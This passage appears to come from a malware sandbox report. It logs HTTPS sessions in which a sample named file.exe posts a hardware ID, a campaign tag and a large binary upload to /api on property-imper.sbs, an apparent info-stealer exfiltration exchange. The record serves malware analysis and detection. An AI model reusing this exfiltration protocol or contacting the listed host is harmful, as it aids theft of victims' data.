                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jUZSiF3AWEFHzIehlfDS4YBu%2BQ0xe6unzH%2BoGa79YGeFeYdpuqgFQXSd9M11%2Fxc%2FRjgWpIxWb6exTeWgV%2BHKixtXvhHbznkuz0qB7hTxip3tZX%2FfMTQ4%2FtfLUpWaMizzu%2B4p510%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8e729f5988680cc8-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=9630&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2845&recv_bytes=15962&delivery_rate=1622222&cwnd=225&unsent_bytes=0&cid=f071db8b2f1f8844&ts=1118&x=0"
                                                                                                                                                                                          2024-11-23 16:44:12 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                          Data Ascii: eok 8.46.123.75
                                                                                                                                                                                          2024-11-23 16:44:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          4192.168.2.549708172.67.162.84443828C:\Users\user\Desktop\file.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:14 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=E96NJXOD6UR
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                          Content-Length: 20531
                                                                                                                                                                                          Host: property-imper.sbs
                                                                                                                                                                                          2024-11-23 16:44:14 UTC15331OUTData Raw: 2d 2d 45 39 36 4e 4a 58 4f 44 36 55 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 41 46 30 37 43 42 37 41 31 36 30 35 38 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 45 39 36 4e 4a 58 4f 44 36 55 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 45 39 36 4e 4a 58 4f 44 36 55 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 45 39 36 4e 4a 58 4f 44 36 55 52
                                                                                                                                                                                          Data Ascii: --E96NJXOD6URContent-Disposition: form-data; name="hwid"77AF07CB7A160586D7CBBD6DF28D3732--E96NJXOD6URContent-Disposition: form-data; name="pid"3--E96NJXOD6URContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--E96NJXOD6UR
                                                                                                                                                                                          2024-11-23 16:44:14 UTC5200OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii: un 4F([:7s~X`nO`i
                                                                                                                                                                                          2024-11-23 16:44:15 UTC1015INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:14 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Set-Cookie: PHPSESSID=h4kg7drm2ibi3shu3sghslfho1; expires=Wed, 19-Mar-2025 10:30:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jjZi07uwxpUkUWAVjSmlG4rBy3XwejzawHkjVky621BQKfUOkpLCETB981rVrljP8kqCr3Iz7Yw8uYmXWpw2F7L1WdKtD6TVs6lR%2FqRl0sneiMgsXqk%2FAeHec6fEWep6NC3eZ7k%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8e729f6cdc51431b-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2787&sent=15&recv=28&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21488&delivery_rate=388349&cwnd=242&unsent_bytes=0&cid=5fbec94ba3881ba6&ts=1225&x=0"
                                                                                                                                                                                          2024-11-23 16:44:15 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                          Data Ascii: eok 8.46.123.75
                                                                                                                                                                                          2024-11-23 16:44:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          5192.168.2.549709172.67.162.84443828C:\Users\user\Desktop\file.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:16 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=FX89WU75Q6HN2YY
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                          Content-Length: 1245
                                                                                                                                                                                          Host: property-imper.sbs
                                                                                                                                                                                          2024-11-23 16:44:16 UTC1245OUTData Raw: 2d 2d 46 58 38 39 57 55 37 35 51 36 48 4e 32 59 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 41 46 30 37 43 42 37 41 31 36 30 35 38 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 46 58 38 39 57 55 37 35 51 36 48 4e 32 59 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 46 58 38 39 57 55 37 35 51 36 48 4e 32 59 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d
                                                                                                                                                                                          Data Ascii: --FX89WU75Q6HN2YYContent-Disposition: form-data; name="hwid"77AF07CB7A160586D7CBBD6DF28D3732--FX89WU75Q6HN2YYContent-Disposition: form-data; name="pid"1--FX89WU75Q6HN2YYContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
                                                                                                                                                                                          2024-11-23 16:44:17 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:17 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Set-Cookie: PHPSESSID=s2bnhcr1n0574l47sua04tt18p; expires=Wed, 19-Mar-2025 10:30:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MRo8GsNnSfYz%2F1tZCQLaLQ5udhSSLrg6RBa%2FrUqWXQP1v3gOPM0LbA1Ayi%2FZ47SMRJNmF7GA4EyZk4%2FvbbbmkwYo8PbSQxNjzk%2BQibPI1buFqdjg8C2YdnbR4D3xO7f77d0s0XI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8e729f8029395e78-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1846&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2161&delivery_rate=1534419&cwnd=252&unsent_bytes=0&cid=ba71a3e7d6ca153e&ts=865&x=0"
                                                                                                                                                                                          2024-11-23 16:44:17 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                          Data Ascii: eok 8.46.123.75
                                                                                                                                                                                          2024-11-23 16:44:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          6192.168.2.549712172.67.162.84443828C:\Users\user\Desktop\file.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:19 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=XB5QYD0PG
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                          Content-Length: 570841
                                                                                                                                                                                          Host: property-imper.sbs
                                                                                                                                                                                          2024-11-23 16:44:19 UTC15331OUTData Raw: 2d 2d 58 42 35 51 59 44 30 50 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 41 46 30 37 43 42 37 41 31 36 30 35 38 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 58 42 35 51 59 44 30 50 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 42 35 51 59 44 30 50 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 58 42 35 51 59 44 30 50 47 0d 0a 43 6f 6e 74 65 6e
                                                                                                                                                                                          Data Ascii: --XB5QYD0PGContent-Disposition: form-data; name="hwid"77AF07CB7A160586D7CBBD6DF28D3732--XB5QYD0PGContent-Disposition: form-data; name="pid"1--XB5QYD0PGContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--XB5QYD0PGConten
                                                                                                                                                                                          2024-11-23 16:44:19 UTC15331OUTData Raw: 10 42 81 cb 97 c8 c3 ec 4b 64 69 60 d4 02 51 6f 41 94 c7 1f e1 50 a0 91 0c cd bf 3b 3e 8e 9a cd c2 5c ac 86 98 53 cf 40 3b 4c 11 e6 fd c5 9c df d1 60 12 cb f0 46 31 4b da a6 fe 9f 67 50 00 5e 42 a0 69 53 80 79 0d 30 a5 30 3f 42 84 41 c1 20 d0 80 5a 94 67 b5 6c 48 08 09 dc f4 d3 55 62 ba 2c 0d 36 a1 30 b3 bc a1 1d 58 41 49 a0 1a 1d f9 05 64 05 6c f4 bd bd 0c e8 0d 81 0a 2a 57 80 af 5b 29 bf 2e 1c 8d 25 5d 19 ad d3 c1 e5 5f ab 4b d5 2a 3a dd 87 1f 88 94 41 0b 7d 54 a4 af ff e2 d1 f7 04 b6 8e 26 9b 8c 11 3a 3d 4b a1 6f 82 79 be 4e fc 20 60 3c d3 d9 f3 b8 c6 f1 a3 2c ee b7 3e 46 98 6e b7 ef f0 7c 00 53 f8 f4 70 7d b8 c2 ca a3 22 f6 21 61 14 84 53 03 a5 59 c9 a7 5d d2 f1 79 5a d0 2b fd 66 c4 6d f7 28 c0 c3 75 9c b5 1c a5 d1 57 bf 98 44 20 ad b8 76 ad 36 6c 4d
                                                                                                                                                                                          Data Ascii: BKdi`QoAP;>\S@;L`F1KgP^BiSy00?BA ZglHUb,60XAIdl*W[).%]_K*:A}T&:=KoyN `<,>Fn|Sp}"!aSY]yZ+fm(uWD v6lM
                                                                                                                                                                                          2024-11-23 16:44:19 UTC15331OUTData Raw: 96 fc c3 2c 3f 47 fd cf 95 8e 49 05 47 04 44 61 42 b6 37 1c a9 06 50 97 c8 15 7e ea 56 38 7e d1 6e c9 74 42 91 df 44 8f 5f 63 8f 45 f4 54 bb fb d6 03 11 5a c6 0e 01 33 47 e5 ad 6f 56 bf 3f d3 66 d8 b2 3d 4f c4 ad 15 89 9c b9 7b e6 2b 77 31 4d ca 51 de 98 d4 89 81 68 3b 75 27 58 cf f6 1d 62 7e 91 d4 ec 64 7d 4c 6c 59 87 ad 07 6a 54 a1 e0 02 e1 c9 17 a6 f6 3b 56 43 e5 1b 61 03 b6 3f 57 71 ee 0c 71 f5 37 5d cd 8a a2 fc bd 38 7c b1 e4 42 fd 22 12 d3 b1 33 d2 07 73 11 e8 4e 98 8e 30 44 a7 90 52 0a 4c d5 78 fb 40 bd d1 e6 ab d7 75 69 8b 4d 51 c2 6a 78 d7 0f b6 e9 0c d5 55 32 39 ad fa 4b 35 49 69 dc b0 42 72 7e a5 84 27 a5 2b a1 21 89 0e b2 c7 98 d1 2c b3 9a f6 15 c6 c6 13 67 dc d8 04 e1 c5 6a 94 19 36 6c cb 19 93 9c 80 f6 14 21 cc ed cf 57 79 3c 63 a9 21 19 1d
                                                                                                                                                                                          Data Ascii: ,?GIGDaB7P~V8~ntBD_cETZ3GoV?f=O{+w1MQh;u'Xb~d}LlYjT;VCa?Wqq7]8|B"3sN0DRLx@uiMQjxU29K5IiBr~'+!,gj6l!Wy<c!
                                                                                                                                                                                          2024-11-23 16:44:19 UTC15331OUTData Raw: 51 94 cf b3 72 bc c9 fc ab 5f f9 cc d4 40 7b 00 36 5c 7b 11 f1 46 21 8e cb 75 7e 61 0a 3f b7 98 10 e3 c7 01 6c e4 5f 3f 1b 19 2a 02 9e 28 8e 1a 28 16 ac 3d 45 29 b3 e1 81 d4 b7 7b 94 03 63 c4 fa 62 9b c8 c9 45 da 77 89 10 66 44 76 49 b5 3f 89 08 6c cc b0 88 e8 d8 c2 9d ff 48 1c df fa 8c 91 24 c2 c4 04 92 8a 45 d4 9c 11 b9 1c b8 7a 93 b0 21 80 9a c2 8e f3 93 b8 b5 88 e0 fd 18 ea 3e 7e 68 ef 5c 69 bb e1 12 7e 06 e1 79 97 09 c9 f3 a6 51 47 ce 3e b9 68 7b cc ac 1d 6a 96 d2 4a 7a e8 35 cf a4 b4 35 45 fa 35 29 64 d7 94 ce 9a 4f 70 54 41 bb 87 a1 a2 96 9f 38 9d bf 4d c8 72 86 67 57 7b d1 7b a7 46 98 77 c5 73 1d b7 b0 1f 14 2f 0d 1d f7 e3 67 d8 14 54 f1 db ee fc e4 bf a2 5a 8c 80 78 9a 41 da 4c ce 0a d7 7f 5c d1 94 c8 ec f1 f8 6a 7e 54 ef db f1 ca 47 99 f7 f2 8d
                                                                                                                                                                                          Data Ascii: Qr_@{6\{F!u~a?l_?*((=E){cbEwfDvI?lH$Ez!>~h\i~yQG>h{jJz55E5)dOpTA8MrgW{{Fws/gTZxAL\j~TG
                                                                                                                                                                                          2024-11-23 16:44:19 UTC15331OUTData Raw: 68 ea aa b0 cd f7 35 c8 f4 8d fa 50 07 d7 99 ed 06 66 10 b2 a9 8e c2 39 87 40 c3 e1 28 46 c9 62 eb e0 c6 56 c0 2d ca 45 65 df 69 c1 3c 5f 67 be a3 2a e5 68 b7 81 db 33 c3 fe 11 8c da e2 e3 ff 50 43 b5 ef 62 a3 13 fe ff 12 6e 04 28 74 82 68 f7 ef 01 37 32 e3 b1 28 c8 a5 f8 1c 00 14 1f 09 8a 00 b7 51 73 f3 f2 5b b1 23 14 c5 8c f7 5d 2b 46 64 8b 70 cd e6 3a da 92 e6 66 dd eb 16 ac 7b 76 cd f4 06 3f 44 9e 59 3c 0d ac 3e 2a ca 47 de 74 42 52 b5 14 52 cc b3 a3 45 db 2a 50 ad 83 29 b3 fc fd fc 50 75 25 8a 40 ae e8 3d 9f 74 e5 0a 57 15 14 b7 25 d1 5a 1b 6f 6d 55 34 ae 5b 86 b8 65 92 49 86 33 36 13 e8 0f 3b 52 fc 38 6a 5a 67 1e 13 e9 b9 2b 42 3a 90 f4 fe 71 76 4c 58 ea 56 53 bc 66 6d 66 00 76 1f 38 c3 6a 2a 75 b6 88 e6 85 26 d2 3f a9 ea 4d 20 9f 57 48 68 4c 4c c4
                                                                                                                                                                                          Data Ascii: h5Pf9@(FbV-Eei<_g*h3PCbn(th72(Qs[#]+Fdp:f{v?DY<>*GtBRRE*P)Pu%@=tW%ZomU4[eI36;R8jZg+B:qvLXVSfmfv8j*u&?M WHhLL
                                                                                                                                                                                          2024-11-23 16:44:19 UTC15331OUTData Raw: 2b 38 c2 fe 82 9d ff 9b 3f a6 ce e7 bb 10 c1 8a 6c f1 ac 4d 46 b7 99 d7 a7 8e 10 c2 14 89 c9 27 9d 1f 36 06 eb ec a8 6d c4 c6 07 cd e5 91 13 c5 f7 ab 61 54 f2 c2 19 26 4c af ea 1c 92 a8 c7 93 00 08 f6 ff 23 cc 33 ad 93 95 81 22 19 70 f3 0c 6d 95 1b 2e 6c 0a a3 e0 ce ad 26 37 33 13 fe a5 28 bf cd bb 6f 6d d2 a8 c1 ce 6e 3c a5 9f 78 5f 6e 3d 2e 4c 82 85 7e 36 3a 19 a0 c4 09 22 c4 69 76 4c ec 5d 61 d1 8d ab 6f b5 e8 06 f1 2a f9 c6 28 03 f5 25 46 65 75 b2 68 f2 44 c7 7b 37 25 e2 05 ea d4 fc 2f 7d 18 a9 1e e9 99 01 e0 16 25 33 8d db d4 5d 58 8e 5f ba 9b 81 06 cd 4f a8 31 11 61 b7 f6 fb cc b3 15 5b e8 db 9d 40 f1 10 6b ca b9 80 d3 e1 2c 67 0e b4 18 c8 12 57 93 18 07 1c af 62 d7 d1 89 6c c7 d7 88 8e d5 52 45 af ff bb 1f fd 17 60 d8 5d 02 2a da 0c e7 dd da 0c 3e
                                                                                                                                                                                          Data Ascii: +8?lMF'6maT&L#3"pm.l&73(omn<x_n=.L~6:"ivL]ao*(%FeuhD{7%/}%3]X_O1a[@k,gWblRE`]*>
                                                                                                                                                                                          2024-11-23 16:44:19 UTC15331OUTData Raw: bc 97 ec bd 45 fb 36 ca 5c a4 9c e5 78 36 52 99 d4 9f 42 7e cc bc b9 4b 50 f6 55 ed 5a 56 b5 3d fb 1f 17 fd 84 af 74 3b ad b0 18 59 29 c2 d4 6f d6 39 21 b4 06 e7 89 54 46 5e 93 14 e5 d9 10 e1 c5 22 f7 a7 cb 67 67 ff e3 ad e4 fd ef 9a 97 35 5e 2b 3b 60 30 d2 77 d1 b3 f1 c4 88 ba ea 18 52 13 c5 fc 03 29 01 fd 87 7d 74 2a 13 15 7b 78 96 39 73 5a 78 f1 66 24 39 57 d5 41 e5 2b 80 c6 32 83 06 f8 e9 64 ae 2a 2b d2 23 09 db 51 5f e3 30 06 85 7f 98 05 97 f7 f1 c9 df 45 5d c2 4f a7 41 2b 55 15 a3 c1 64 98 ce af 3b 73 f4 c1 1a 2a c1 8b 31 21 4f 9c f7 19 ca 7c 4a a1 19 8d 64 a7 8b e6 0a 9b 56 c0 66 30 7b e4 c7 ab 89 a0 01 29 76 bb 25 6d ec 54 3d cf 4a 51 98 56 41 22 a7 55 d6 1b 9f fb 30 de d8 7f 09 77 9a bb 23 20 b0 32 bf 07 a5 20 b0 25 bd eb 86 3e 66 0a 76 25 fd ab
                                                                                                                                                                                          Data Ascii: E6\x6RB~KPUZV=t;Y)o9!TF^"gg5^+;`0wR)}t*{x9sZxf$9WA+2d*+#Q_0E]OA+Ud;s*1!O|JdVf0{)v%mT=JQVA"U0w# 2 %>fv%
                                                                                                                                                                                          2024-11-23 16:44:19 UTC15331OUTData Raw: 8f 76 2f 92 0c ee ed d5 b0 c0 9e a8 b0 02 ee 82 66 15 2e af ea b7 0b 12 d0 68 19 fb 8c 9a 0b 98 d4 88 c0 72 71 e4 c7 a5 9f cf a0 d3 d7 95 47 7f da 1e b0 aa 68 36 13 41 05 ab 92 72 7f 38 a1 20 1d b1 53 47 2e a4 3d 80 ad 0d 86 8a d1 cf 37 e3 14 c2 74 36 f3 49 d6 63 75 92 9c 37 f2 94 eb 3b a3 40 d3 70 7a 3a 00 bb e2 72 ec b7 32 a7 55 df a7 fe 89 5f ea 33 d3 a7 91 92 4d 7c 09 af 0e 0c 30 ad 91 8a 75 a2 24 da d1 14 5b df 3b 83 43 21 77 aa 79 e6 d4 36 7b e5 93 ac 4d d4 9c 3b 9c af c5 70 4a f7 d9 c9 07 5a 60 ad 82 dc a8 70 e3 06 a3 7e 86 1e 1d a4 e8 9c 9e a2 3f c2 08 49 83 f5 4e 6e d1 a2 5a 15 fe 0d 9e 38 f2 33 3f e3 fb d0 4a b6 88 5b 67 8c 0f c3 64 33 7b fa 5d e4 8b b6 15 fa fd 32 9b 1b ab b6 75 77 9c 86 88 f1 d2 f4 e7 a3 5b ba 6b 7c 2e 44 ea a3 36 b0 47 da 42
                                                                                                                                                                                          Data Ascii: v/f.hrqGh6Ar8 SG.=7t6Icu7;@pz:r2U_3M|0u$[;C!wy6{M;pJZ`p~?INnZ83?J[gd3{]2uw[k|.D6GB
                                                                                                                                                                                          2024-11-23 16:44:19 UTC15331OUTData Raw: 14 ba 03 c8 5a 91 45 b9 82 07 00 a9 31 e6 84 48 1e a1 75 1f 12 f9 7a c9 25 f6 d3 ee db a1 36 6f f4 a4 1e 26 bc c3 2d 78 ed cd 00 7a a9 9c d7 57 f9 95 2b f5 af 81 e4 c3 a7 2b 62 f4 db 70 3e df ed 02 50 56 1b 68 9c 25 aa b7 c1 8e f7 86 9e 5c 36 98 e4 ee e2 de 2c d3 25 29 fd ae 7a e5 5b 94 cc d1 04 b3 ad 83 54 b9 cd 6d 60 af 49 52 41 2e 43 0d b5 6e 0a 83 28 bc e7 80 ec dc 21 44 3c 2e 08 02 84 8a 74 36 8a 16 3d ff 5e 30 d3 3a 18 e3 c5 79 76 2e c1 98 32 a4 70 2b 54 9c bb a8 8f 45 09 b0 5f ef d8 29 f4 db 32 53 0b 9c 51 e8 ad 80 49 89 9e 56 14 23 63 09 94 f7 3c a5 b8 1d da ba 7b a3 e3 8a 75 31 51 f1 d1 1a 30 c1 c3 96 d1 e1 43 13 9b 94 27 ab e9 0c 87 18 e5 01 c8 1f b3 9d 30 36 6b 09 b7 10 42 ac 2a 7d b1 00 b0 40 e5 62 2e 16 1d c2 cd 2e 01 08 f8 eb 65 1c 1e 5f 0c
                                                                                                                                                                                          Data Ascii: ZE1Huz%6o&-xzW++bp>PVh%\6,%)z[Tm`IRA.Cn(!D<.t6=^0:yv.2p+TE_)2SQIV#c<{u1Q0C'06kB*}@b..e_
                                                                                                                                                                                          2024-11-23 16:44:19 UTC15331OUTData Raw: a8 33 3e 17 67 9a d2 2d 7a fd 8c 41 4f 7e f4 d7 b7 d1 7f 54 4a 37 7e fa 0c 6c 18 79 5e 9e e9 ce a7 c8 0f 5f 1d aa ae f6 fa d8 5f 11 1e 65 6f 5c 76 85 83 66 8e bd b9 54 e6 fa f8 d4 cc 4e f7 92 21 c5 b5 9b 3f cd 94 e1 43 1f c2 ad 11 b4 c3 04 72 9e 4e d3 28 0e 14 fa a1 a1 86 24 de 45 09 a6 a7 20 80 b3 eb d6 6d 59 a5 97 c7 0f 30 97 5a 75 2b c7 5b d3 2b b5 2c 90 99 be 80 e2 c3 4f ec a5 40 8a bc fa ff 76 b5 e1 c1 15 41 d8 0e 53 a0 dd 8e 1d 18 d2 c6 f1 55 c6 bf 28 b5 f5 6a bc cc e3 99 27 f4 aa 39 25 f4 3c 5f c8 cb 41 5a 94 a1 94 9c 1a 13 d7 e2 97 7a 5f f6 02 94 10 89 12 60 38 ea e0 4e dd ad 95 f6 49 45 7a 63 35 6a f2 90 d1 9f 7f 8d 1a de 09 c3 4f 9a c6 40 de 80 1f 9a c0 6c e5 c1 29 ac 6c ab d5 fe 5e f1 81 b7 7d 06 88 54 23 f0 21 ad f0 fb c7 dd ea bd a1 17 4f 71
                                                                                                                                                                                          Data Ascii: 3>g-zAO~TJ7~ly^__eo\vfTN!?CrN($E mY0Zu+[+,O@vASU(j'9%<_AZz_`8NIEzc5jO@l)l^}T#!Oq
                                                                                                                                                                                          2024-11-23 16:44:26 UTC1017INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:26 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Set-Cookie: PHPSESSID=7fvsjqiue8c1o7bl4pe5qaf3d6; expires=Wed, 19-Mar-2025 10:31:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EGNsghpwzvUFIn3GVSjp6ZzsmFNt8kQR3vUtT%2F6Cs6nwcpMdAOtaSXB5xgWxQ7YyGSGAZs9ulUMgUECIB0dw7i9Bejnds4SQhwwlxMsKMILFvFd1dSDoWJ9G6RQXQ8HeeSegU9Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8e729f90bfc180cd-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1521&sent=369&recv=509&lost=0&retrans=0&sent_bytes=2846&recv_bytes=573381&delivery_rate=1789215&cwnd=177&unsent_bytes=0&cid=e490473c56497bcc&ts=6601&x=0"


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          7192.168.2.54971152.149.20.212443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
